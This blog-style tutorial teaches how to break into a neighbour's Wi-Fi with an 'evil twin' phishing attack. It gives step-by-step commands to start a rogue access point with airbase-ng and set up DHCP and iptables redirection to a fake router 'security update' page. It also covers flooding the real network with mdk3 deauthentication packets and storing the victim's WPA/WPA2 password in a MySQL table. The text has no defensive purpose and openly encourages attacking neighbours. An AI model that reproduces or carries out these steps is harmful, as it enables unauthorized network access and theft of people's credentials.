How To Hack Wifi Using Evil Twin [Wifi Phishing] ? : Tutorial

How To Hack Wifi Using Evil Twin [Wifi Phishing] ? : Tutorial

Hello Hackers, this article is for them who don’t have a internet connection at their home and rely on their mobile data for accessing the internet, and most of the user have the desire to hack into out neighbours wifi and show that we are pro’s, well its time for you to think like a hackers and work.

What would you do to hack into your neighbour wifi? Bruteforce, well you might be lucky if their password is ‘12345678’, but what if they have a complicated password. Then the only way for you is to force them to enter the password for you. And how could you do that, just by this method

Requirements :

  1. Kali Linux
  2. External wireless adaptor [TP-link, Alpha, Zeus, ZTE, etc…]
  3. Internet connection on your attacking machine

The logic to do this is simple, you just have to create a fake access point(Evil Twin) with the same name with no security, and setup a password database on your machine to store the password and webpage to show the victim that he is required to type in the password to access the internet , to setup the webpage you need to know the makers name of the wifi router, when you send De-Auth(de-authentication) packets to the victim he cannot connect to the real one instead he has to connect to the fake access point(Evil Twin) and when he does so, the victim is presented with a password filed to enter which would be stored in our database

So let us get started…..

Step by step How to Create Evil Twin Access Point

Step 1:

Login to your Kali Linux machine…

Establish an internet connection to your host machine…

Now we have to install DHCP server as follows…

Open the terminal and type apt-get install dhcp3-server as show below:

In the screenshot, I have already installed the DHCP server…

Step 2:

Now we need to configure the DHCP server.

Open your terminal and type nano/etc/dhcpd.conf, you should have a blank file opened up on your terminal.

Now type the following shown on the screen shot below

After typing press ctrl+x and then press y and hit enter to save it.

Step 3:

Now download the security update page which the client will see when they open up the web browser…

To do that,

change your working directory to, cd /var/www in your terminal and do as follows:

rm index.html (will remove the apache index file)

wget (Download the file)



Step 4:

Now type the following to start your apache server and mysql respectively:

 /etc/init.d/apache2 start

/etc/init.d/mysql start

Now that MySql is loaded, we have to create a database where we can store the WPA/WPA2 password that the client enters into the security update page…

Type the follows:

mysql -u root

       create database evil_twin;

       use evil_twin

       create table wpa_keys(password varchar(64), confirm varchar(64));

In the above screenshot, the database already existed.

Leave the mysql terminal open.

Step 5:

Now we need to find our local network adapter interface name and our local ip

Now open the new terminal and type:

ip route (take note of local ip and wired interface)


airmon-ng start wlan0


NOTE: eth0 is my interface name and is my local ip


airodump-ng -M mon0 (take note of target essid,bssid and channel number)

airbase-ng -e [ESSID] -c [ch. #] -P mon0

NOTE: [ESSID]  is your targets ESSID and [ch. #] targets channel no.

Step 6:

Our evil twin access point is now up and running, we need to configure our tunnel interface so we can create a bridge between our evil twin access point and our wired interface and our tunnel interface is named at0, which was created when we created evil twin access point using airbase.

Don’t close airbase and mysql terminal…

Now open a new terminal and type as follows:

  ifconfig at0 netmask

now we need to add a routeing table to enable IP forwarding so we can forward traffic to and fro from our evil twin access point…

so, type the following:

route add -net netmask gw

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE

iptables –append FORWARD –in-interface at0 -j ACCEPT

iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination [LOCALIP ADDRESS:80]

iptables -t nat -A POSTROUTING -j MASQUERADE

dhcpd -cf /etc/dhcpd.conf -pf /var/run/ at0

etc/init.d/isc-dhcp-server start

Step 7:

Now we need to force our clients to connect to our evil twin access point and to accomplish this we need to disconnect the clients by performing the de-authentication attack. To do that first we need to create the blacklist file that contains BSSID of the target.

Do as follows:

echo [BSSID] > blacklist

NOTE:[BSSID] BSSID of the target

mdk3 mon0 d -b blacklist -c [CH.#]

Now go back to airbase terminal to check if any client has connected to your evil twin access point.

If he is connected to the evil twin access point he will see the security page as shown below which asks for password…

Where the client enters his WPA/WPA2 password and clicks on the update.

Now go over to the mysql terminal and type

 use evil_twin

select * from wpa_keys; {To view the password entered by the victim in our mysql database}

So that’s it, that’s how you create an evil twin access point.

Hope you found it useful

Leave a Reply